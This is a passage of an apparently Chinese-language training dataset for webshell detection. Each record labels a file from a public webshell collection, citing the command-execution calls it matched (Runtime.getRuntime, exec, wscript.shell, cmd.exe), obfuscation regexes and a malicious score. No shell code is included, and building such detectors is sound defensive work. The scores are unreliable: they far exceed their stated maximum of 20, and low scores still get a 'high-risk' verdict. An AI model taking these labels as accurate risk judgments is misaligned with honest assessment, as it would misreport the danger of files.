"tennc-webshell/jsp/hackk8/JSP_66/other/download.jsp", "malicious_score": 184, "md5_hash": "fa87bbd7201021c1aefee6fcc5b8e25a"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspspy_k8.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84420 bytes\", \"行数\": 2323}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/JSP_66/other/jspspy_k8.jsp", "malicious_score": 315, "md5_hash": "71097537a91fac6b01f46f66ee2d7749"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspspy.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84543 bytes\", \"行数\": 2329}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/JSP_66/other/jspspy.jsp", "malicious_score": 315, "md5_hash": "ab77e4d1006259d7cbc15884416ca88c"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"thx.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6217 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/JSP_66/other/thx.jsp", "malicious_score": 23, "md5_hash": "794e656491eddf9694975adcd2915ec0"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma4.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"56060 bytes\", \"行数\": 1780}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/fuck-jsp/ma4.jsp", "malicious_score": 175, "md5_hash": "eebc60a70e1823f2aa519a57fb8992c7"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"no.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"30189 bytes\", \"行数\": 995}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/fuck-jsp/no.jsp", "malicious_score": 37, "md5_hash": "08f3b1efbec31fcc861efac30aaafaff"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspSpyJDK5.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"86575 bytes\", \"行数\": 2408}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 316/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/fuck-jsp/JspSpyJDK5.jsp", "malicious_score": 316, "md5_hash": "341298482cf90febebb8616426080d1d"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"spjspshell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"18473 bytes\", \"行数\": 814}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 34/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/fuck-jsp/spjspshell.jsp", "malicious_score": 34, "md5_hash": "7ab8dac087317a99e1be1234bc585ce8"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"32024 bytes\", \"行数\": 807}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 具备文件操作能力: copy\\s*\\( 恶意度评分: 112/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/fuck-jsp/ma2.jsp", "malicious_score": 112, "md5_hash": "e94e8a70845ae6fac92209fc3099beb9"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JFolder.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"31057 bytes\", \"行数\": 1022}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/fuck-jsp/JFolder.jsp", "malicious_score": 37, "md5_hash": "6bd8edbd1a1c262000d0958a3794fdb6"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"job.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"57726 bytes\", \"行数\": 1811}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/fuck-jsp/job.jsp", "malicious_score": 175, "md5_hash": "d6a0655273ed5bf26242ea4c8afcd02a"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma3.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84411 bytes\", \"行数\": 2317}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/fuck-jsp/ma3.jsp", "malicious_score": 315, "md5_hash": "7d149e78f2ab9e419dd34a135c920432"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"silic webshell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"27766 bytes\", \"行数\": 844}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/fuck-jsp/silic webshell.jsp", "malicious_score": 37, "md5_hash": "d8317bf0239a65c4f8055f9e066fdae5"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"53835 bytes\", \"行数\": 1811}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/fuck-jsp/ma1.jsp", "malicious_score": 175, "md5_hash": "e1afc17af43733629dc562c8462024fa"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"in.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"28853 bytes\", \"行数\": 982}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/fuck-jsp/in.jsp", "malicious_score": 37, "md5_hash": "ffb4ddde520f78481706510db4ab55ab"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"85012 bytes\", \"行数\": 2344}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 324/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/fuck-jsp/jspbrowser/1.jsp", "malicious_score": 324, "md5_hash": "66babb369c3c9dd3a7b02e9acbf1e210"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Browser.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"73483 bytes\", \"行数\": 1934}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 184/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/fuck-jsp/jspbrowser/Browser.jsp", "malicious_score": 184, "md5_hash": "a7e25b8ac605753ed0c438db93f6c498"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"55431 bytes\", \"行数\": 1778}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/fuck-jsp/jspbrowser/2.jsp", "malicious_score": 175, "md5_hash": "5b50da3be91aed89f167b27108adf5d8"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jsp-reverse.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2451 bytes\", \"行数\": 91}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/jsp2/jsp-reverse.jsp", "malicious_score": 12, "md5_hash": "8b0e6779f25a17f0ffb3df14122ba594"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"browser.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"68110 bytes\", \"行数\": 1802}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 172/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/jsp2/browser.jsp", "malicious_score": 172, "md5_hash": "37603e44ee6dc1c359feb68a0d566f76"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"list.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"1870 bytes\", \"行数\": 77}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/jsp2/list.jsp", "malicious_score": 6, "md5_hash": "1ea290ff4259dcaeb680cec992738eda"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmdjsp.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"725 bytes\", \"行数\": 32}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/jsp2/cmdjsp.jsp", "malicious_score": 9, "md5_hash": "b815611cc39f17f05a73444d699341d4"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"829 bytes\", \"行数\": 35}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/jsp2/cmd.jsp", "malicious_score": 15, "md5_hash": "5391c4a8af1ede757ba9d28865e75853"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd_win32.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"823 bytes\", \"行数\": 31}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/jsp2/win32/cmd_win32.jsp", "malicious_score": 15, "md5_hash": "cc4d4d6cc9a25984aa9a7583c7def174"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jsp-reverse.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2451 bytes\", \"行数\": 91}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/jsp_77/jsp-reverse.jsp", "malicious_score": 12, "md5_hash": "8b0e6779f25a17f0ffb3df14122ba594"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"browser.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"68110 bytes\", \"行数\": 1802}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 172/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/jsp_77/browser.jsp", "malicious_score": 172, "md5_hash": "37603e44ee6dc1c359feb68a0d566f76"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"list.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"1870 bytes\", \"行数\": 77}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/jsp_77/list.jsp", "malicious_score": 6, "md5_hash": "1ea290ff4259dcaeb680cec992738eda"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmdjsp.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"725 bytes\", \"行数\": 32}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/jsp_77/cmdjsp.jsp", "malicious_score": 9, "md5_hash": "b815611cc39f17f05a73444d699341d4"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"829 bytes\", \"行数\": 35}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/jsp_77/cmd.jsp", "malicious_score": 15, "md5_hash": "5391c4a8af1ede757ba9d28865e75853"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd_win32.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"823 bytes\", \"行数\": 31}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/jsp_77/win32/cmd_win32.jsp", "malicious_score": 15, "md5_hash": "cc4d4d6cc9a25984aa9a7583c7def174"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"菜刀jsp脚本更新版.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"7137 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 26/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/Chropper for jsp/菜刀jsp脚本更新版.jsp", "malicious_score": 26, "md5_hash": "949ffee1e07a1269df7c69b9722d293e"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"菜刀jsp脚本文明版.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"7142 bytes\", \"行数\": 3}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 26/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/Chropper for jsp/菜刀jsp脚本文明版.jsp", "malicious_score": 26, "md5_hash": "4dc03a4b41947ca231df42b5f909e287"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"菜刀jsp脚本无压缩版.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"8633 bytes\", \"行数\": 305}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 26/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/Chropper for jsp/菜刀jsp脚本无压缩版.jsp", "malicious_score": 26, "md5_hash": "5a9fec45236768069c99f0bfd566d754"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"con2.asp\", \"文件类型\": \"asp\", \"文件大小\": \"91690 bytes\", \"行数\": 1266}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, wscript.shell, execute(, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 176/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/con2.asp", "malicious_score": 176, "md5_hash": "13ac4146e4a34e3cb984951ac4ab7701"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"webshell.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1362 bytes\", \"行数\": 50}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, WScript.Shell, WSCRIPT.SHELL, CreateObject( 恶意度评分: 33/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/webshell.asp", "malicious_score": 33, "md5_hash": "43febb8fba2ccf7f4d41ad3e76d18052"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd提权马.asp\", \"文件类型\": \"asp\", \"文件大小\": \"2680 bytes\", \"行数\": 68}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write 恶意度评分: 30/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/cmd提权马.asp", "malicious_score": 30, "md5_hash": "09fcc971f02cda316835457ec3723094"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r00ts无FSO组建大马.asp\", \"文件类型\": \"asp\", \"文件大小\": \"116827 bytes\", \"行数\": 2294}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, eval(, Request.Form, request.form, response.write 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 885/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/r00ts无FSO组建大马.asp", "malicious_score": 885, "md5_hash": "dda2258df6411e360b67fc920bc763d6"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bypass-iisuser-p.asp\", \"文件类型\": \"asp\", \"文件大小\": \"193 bytes\", \"行数\": 1}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Eval(, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/bypass-iisuser-p.asp", "malicious_score": 8, "md5_hash": "924d294400a64fa888a79316fb3ccd90"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Ajan.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1297 bytes\", \"行数\": 30}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: WScript.Shell, CreateObject( 恶意度评分: 21/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/Ajan.asp", "malicious_score": 21, "md5_hash": "b6f468252407efc2318639da22b08af0"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ASPXspy2.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"75305 bytes\", \"行数\": 5157}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/ASPXspy2.aspx", "malicious_score": 36, "md5_hash": "0a40a9f6c193f26c500fc639a27724b6"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"DarkBlade1.5.asp\", \"文件类型\": \"asp\", \"文件大小\": \"98078 bytes\", \"行数\": 3817}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, request.queryString, execute(, CreateObject(, request.Form 发现混淆技术: chr\\s*\\( 恶意度评分: 86/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/DarkBlade1.5.asp", "malicious_score": 86, "md5_hash": "5058bb202af3295ac4cf3ae85b0d94af"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"xslt.asp\", \"文件类型\": \"asp\", \"文件大小\": \"782 bytes\", \"行数\": 9}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, response.write, CreateObject( 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/xslt.asp", "malicious_score": 12, "md5_hash": "ca64f4b452679b4666008106c34d023c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Expdoor.com ASP专用小马.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1428 bytes\", \"行数\": 37}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.write, CreateObject( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/Expdoor.com ASP专用小马.asp", "malicious_score": 6, "md5_hash": "caef01bb8906d909f24d1fa109ea18a7"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"shell.asp\", \"文件类型\": \"asp\", \"文件大小\": \"981 bytes\", \"行数\": 44}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.form, response.write, CreateObject( 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/shell.asp", "malicious_score": 15, "md5_hash": "e63f5a96570e1faf4c7b8ca6df750237"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"good_1.asp\", \"文件类型\": \"asp\", \"文件大小\": \"23117 bytes\", \"行数\": 614}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Response.write, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 119/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/asp/good_1.asp", "malicious_score": 119, "md5_hash": "fd0c49b42d2f155cc34efddfdb1c2cca"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": 